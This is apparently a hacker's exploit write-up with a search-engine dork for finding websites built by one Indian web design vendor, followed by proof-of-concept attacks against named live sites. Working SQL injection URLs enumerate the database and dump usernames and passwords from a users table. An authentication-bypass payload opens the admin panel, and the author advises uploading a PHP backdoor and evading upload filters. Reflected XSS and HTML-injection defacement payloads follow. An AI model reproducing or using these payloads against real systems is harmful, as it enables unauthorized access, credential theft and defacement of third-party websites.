###############################################################################################
# Title : Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection
# Founder : Dj3Bb4rAn0n ( bassem ) I quit facebook :)
# Date : /11/06/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
# Vendor : https://webindiasolution.net
# Dork : allintext:"Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection"
################################################################################################
# PoC
[ + ] Basic Sql injection
----------------------------
http://www.kanchanclasses.in/course-category.php?id=1
The vulnerable paramter here is [ Id ] paramter
Payload : single quoat [ ' ]
fixable at : ( -- -)
If we take a look at the source of the index.php page we can find the admin panel path in this html tag
<img src="kanchanclasses@admin/thumbs/pizap.com15380083585061.png" width="1920" height="1060" alt="image" class="img">
admin panel path : http:/localhost:80/kanchanclasses@admin/
Injection
-----------
| + | number of columns : [ 9 ]
# http://www.kanchanclasses.in/course-category.php?id=1' order by 9 -- -
| + | Vulnerable columns : 2 , 3 , 7
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,2,3,4,5,6,7,8,9 -- -
| + | Getting tables : about,accordian,category,contact,course,gallery,home_welcome_text,image,marque,member,product,seo,slider,user,users,video,whoweare
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() -- -
| + | Getting columns from users's table : id,username,password,name,email,mobile,salt,active
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name="users" -- -
| + | dumping data from the columns [ username , password ]
# http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(0x557365726e616d65203a20,username,0x3a,0x3a,0x50617373776f7264203a20,password),3,4,5,6,7,8,9 from users -- -
[ + ] Sql injection authentication bypass
-------------------------------------------
# If you take a look again at source code of index.php page you will find the admin panel path stored there
# Exactly inside the IMG html tag
# <img src="matadmin/images/slider/slider3-299113911.jpg" alt="slider1" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat">
# Admin panel path : http://localhost:80/matadmin/
# After finding the admin panel path try to injrction this qurey [ '=' 'or' ] as a payload in the username and admin input fields and you will login into the admin panel
page without knowing the username or the password
# Payload : '=' 'or'
# Search for any upload input then try to upload your php backdoor into the server if the server blocked your post request try to bypass it with changing the extenctions
using any proxy tool like burpsuite or tamper data
[ + ] Reflected cross site scripting | XSS |
----------------------------------------------
# Spider all paramters from website and replace the value of the paramters with anything you want example [ FOO ] then send the request if FOO reflect back too you
in the response that means mybe the parater vlunerable to XSS if you wanna make sure it's vulnerable or not try to inject any javascript payload if refletcts back too
you that means the paramter is vulnerable to xss in this situation i m alert payload <script>alert("XSS");</script>
# The vulnerable paramter is [ msg ]
# Payload : </script>alert("XSS");</script>
# GET /book-now.php?book=<script>alert("XSS")</script> HTTP/1.1
# http://www.kanchanclasses.in/kanchanclasses@admin/index.php?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
# Impact : Hackers exploit this vulnerabilty by sending page contain malicious javascript codes leads to steal sensitive data like cookies password and redirect the
victims into another malicious pages
[ + ] HTML injection
------------------
# http://rs-travels.in/book-now.php?book=VOLVO_WITH_WASHROOM
# Vulnerable paramter is | package |
# payload : <marquee>hacked by bassem</marquee>
# http://rs-travels.in/book-now-tour.php?package=%3Cmarquee%3Ehacked%20by%20bassem%3C/marquee%3E